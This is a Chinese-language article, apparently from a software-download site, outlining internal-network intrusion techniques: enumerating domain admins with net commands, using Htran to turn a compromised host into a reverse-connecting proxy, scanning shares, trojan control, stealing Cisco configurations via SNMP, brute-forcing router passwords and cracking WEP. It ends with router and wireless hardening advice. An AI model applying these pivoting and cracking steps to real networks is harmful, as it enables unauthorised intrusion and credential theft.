打破隔離,不同環境中的網絡設備攻擊
發表時間:2023-04-20 來源:明輝站整理相關軟件相關文章人氣:
[摘要]網絡分布與構造 "工作組"與"域" "工作組"是將不同的計算機按功能分別列入不同的組中,以方便管理。 "域"...
網絡分布與構造
"工作組"與"域"
"工作組"是將不同的計算機按功能分別列入不同的組中,以方便管理。
"域"指的是服務器所控制的網絡上的計算機能否加入的計算機組合。
域的建立與控制
1.服務器建立與控制
在組建windows域結構網絡時,必須建立域控制器。
2.客戶端設置
VLAN(虛擬局域網)
虛擬局域網是一種通過局域網內的設備邏輯地而不是物理地劃分為一個個網段,從而實現虛擬工作組的新興技術。
1.基于端口的VLAN
VLAN從邏輯上把局域網交換機的端口劃分出來,從而把終端系統劃分為不同的部分,各部分相對獨立,在功能上模擬了傳統的局域網。
2.基于MAC地址的VLAN
基于MAC地址的VLAN是用終端系統的MAC地址定義的VLAN。
3.基于路由的VLAN
路由協議工作在網絡層,該方式允許一個VLAN跨越多個交換機,或一個端口位于多個VLAN中。
4.基于策略的VLAN
網絡分析與滲透方案法人確定
命令行下的網絡信息刺探
網絡結構
net view
查看域或工作的信息
ipconfig /all 在返回的信息中,"Node Type"表示節點類型信息,NetBIOS的節點類型主要用來表明某計算機節點解析計算機名稱及地址的方法。
B節點只使用廣播方法。 該類型的節點在本地子網上使用廣播消息來發現位于同一子網中的計算機。
P節點只和名稱服務器使用點對點通信。 該類型的節點使用服務進行查詢以獲得要解析的地址。
M節點先使用廣播,再點對點通信。 該類型的節點在LAN上發送廣播消息來查找另一臺計算機,如果沒找到則轉為使用P節點方式繼續查詢。
H節點先使用點對點通信,然后使用廣播。 該類型的節點先使用NetBIOS名稱解析服務來進行注冊或者解析。 無法連接則轉為使用B節點。
域角色信息
先查獲本機在域中的角色net localgroup adminnistrators 再查看域用戶名單 net user /domain
獲得域用戶名單后,需要查看這些名單哪些用戶是域管理員。 net group "domain admins"/domain 要查看某個域管理員狀態 net user adam /domain
一些常用的網絡滲透命令
1.net group 管理域中的全局組
2.net view 顯示共享資源
3.net accounts用戶帳號數據庫管理
4.net session管理服務器計算機連接
5.net file顯示服務器上打開的共享文件名稱
6.net computer域計算機管理
7.net localgroup管理本地組
信息利用與手法綁定
滲透基礎 所有的后續入侵操作,都是建立在內網主機連接的基礎上。
滲透思路
滲透方案
首先,內網遠程溢出是一個很重要的網絡滲透攻擊方式。
其次,內網的弱口令掃描刺探也是狠重要的入侵利用方式。
另外,內網嗅探,ARP欺騙會話劫持都是狠有效的方法。
端口轉發與代理,內網潛入的基礎
被誤用的端口轉發
端口轉發是一個網絡端口從一個網絡節點到另一個網絡節點的行為,使一個外部用戶經過一個被激活的NAT路由到達一個在私有內部IP上的端口。
“肉雞”變跳板,Htran端口轉發
Htran端口轉發建代理 Htran是一個功能狠強大的端口轉發工具。
1.安裝端口轉發服務
首先,攻擊者先將"Htran"工具通過遠程溢出上傳到遠程被控制的主機上。 執行安裝命令htran20.exe -install 再執行htran20.exe -start
2.本機端口監聽
htran20.exe -s -listen 800 8888
3.遠程主機端口轉發
htran20.exe -s -connet 202.172.98.198 800 執行命令后,被入侵控制的遠程主機就會自動連接到攻擊者所在本地IP的800端口。
4.代理建立成功
代理連接,進入內網
攻擊者在本地運行"SocksCap V2.38"的socks代理工具,是遠程被入侵的主機成功代理跳板,成功入侵內網。
SocksCap讓任意工具使用代理
X-Scan掃描到內網
滲透內網,文件共享攻擊實例
1.手工滲透內網共享
假設通過X-Scan掃描器,掃描到遠程主機的內部網絡中有一些主機開啟了文件共享,選擇其中的IP地址作為攻擊目標。
2.Shed掃描內網共享機密
Shed是一個共享資源掃描工具,攻擊者利用它可以通過端口轉發建立代理,直接從本地主機掃描遠程主機內部網絡中共享資源并進行訪問。
3。 局域網超級滲透工具NetSuper
NetSuper是一個內部局域網共享資源掃描與破解工具
4.破解共享破密的工具-SMB Scanner
木馬與終端,助攻擊者滲透內網
遠程終端跳板滲透
木馬滲透內網
"上興遠程控制"是一款功能強大的遠程控制軟件。
1.配置服務端,內網連接
2.遠程連接控制
3.盜密碼,滲內網
4.開啟滲透代理
5.遠程控制與命令行下的滲透
路由,打開內網滲透的通道
路由器的安全隱患
路由器的工作原理
路由器的核心作用是實現網絡互連,每個路由器中都存在一個路由表,路由表為路由器存儲了到達網絡上任一目的所需要的一切信息。
路由器配置方式與攻擊入口
路與器的配置有很多種,主要有本地Console端口配置,Telnet遠程登錄配置,ftp配置,遠程撥號配置
帶路由的ADSL攻擊漏洞
無線路由的安全軟肋
Cisco路由器攻擊案例
1.尋找有漏洞的Csico路由器
路由器的遠程控制方法有兩種:一種是Telnet,二是SNMP代理 第二種控制方式是通過在路由器上配置好SNMP代理,包括MIB變量訪問,MIB變量設置,SNMP中斷和SNMP團體字符串。
工具"SolarWinds 2002",如果掃描到private權限的Cisco路由器,就可以通過專門的下載路由器的配置文件。 然后通過查看配置文件可以看到Console以及Vty的登陸密碼。
2.下載配置文件
3.獲取控制密碼
4.偷梁換柱,替換特權密碼
5.SolarWinds 2002功能列表
路由器登錄密碼的暴力破解
1.掃描路由器web配置頁面
2.無限制破解路由器密碼
web密碼砸門器 webCracker強求破解http://www.arpun.com/soft/19208.html GoldenEye破解路由密碼
3.ADSL MODEM的路由攻擊破解
x-scan掃描破解ADSL MODERM路由器密碼
ADSL密碼終結者 指定攻擊IP地址 設置掃描選項 快速破解
無線路由的WEP破解http://www.arpun.com/article/8624.html
1.SSID信息搜索與探測
"WinAircrackPack"工具,掃描檢測出無線網絡的SSID號和頻段
2.更新嗅探驅動
3.SSID破解
4.破解無線網絡密鑰
路由器滲透與利用
1.NAT端口映射,路由器滲透內網
對于入侵者,直接訪問路由器IP地址,只能連接路由器設備上,要滲透入侵內網中的主機,唯有在路由器上進行端口映射操作,從而將連接轉向到內網主機的某個端口。
專業路由器NAT設置
show arp terminal history size 0
ADSL路由的端口映射
2.DDOS攻擊,拒絕服務
路由器的網絡過濾攻擊
路由器破壞升級
3.路由變"武器庫"與入侵跳板
攻擊者在入侵控制路由器后,甚至可以在路由器中存儲自己的木馬后門或者其他攻擊工具,或者將路由器作為入侵的跳板,隱藏自己的IP地址。
路由存后門
路由器作為跳板
截斷通道,掐住內網入侵的命脈
限制代理上網,阻止內網突破
"億特上網管理專家"的安裝與設置
添加控制策略,禁用代理上網
創建上網用戶帳號,指派控制策略
路由安全配置手冊
路由安全配置的原則
1.登錄最小權限原則
2.強壯與加密的口令密碼
3.路由器訪問控制
4.禁止路由信息外泄
ACL訪問控制列表,控制VTY終端連接
Cisco路由器的幾條安全配置命令
1.路由內置服務設置
2.端口安全配置
3.Telnet系統登錄認證
4.Vty登錄認證設置
5.SNMP配置及安全
6.Cisco的安全配置模板
ADSL MODERN的簡單保護
修改默認路由密碼
控制遠程連接
無線路由安全設置
1.無線網絡安全設置要點
首先,要關閉SSID廣播
其次,要嚴格設置WEP和WPA安全加密功能
另外,建立MAC地址方式的訪問控制列表
最后,關閉計算機的Ad-hoc方式接入功能
無線路由安全配置實例
Internet網絡連接設置
更改無線網絡標示
無線路由加密模式
關閉SSID廣播
設置MAC控制列表
上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。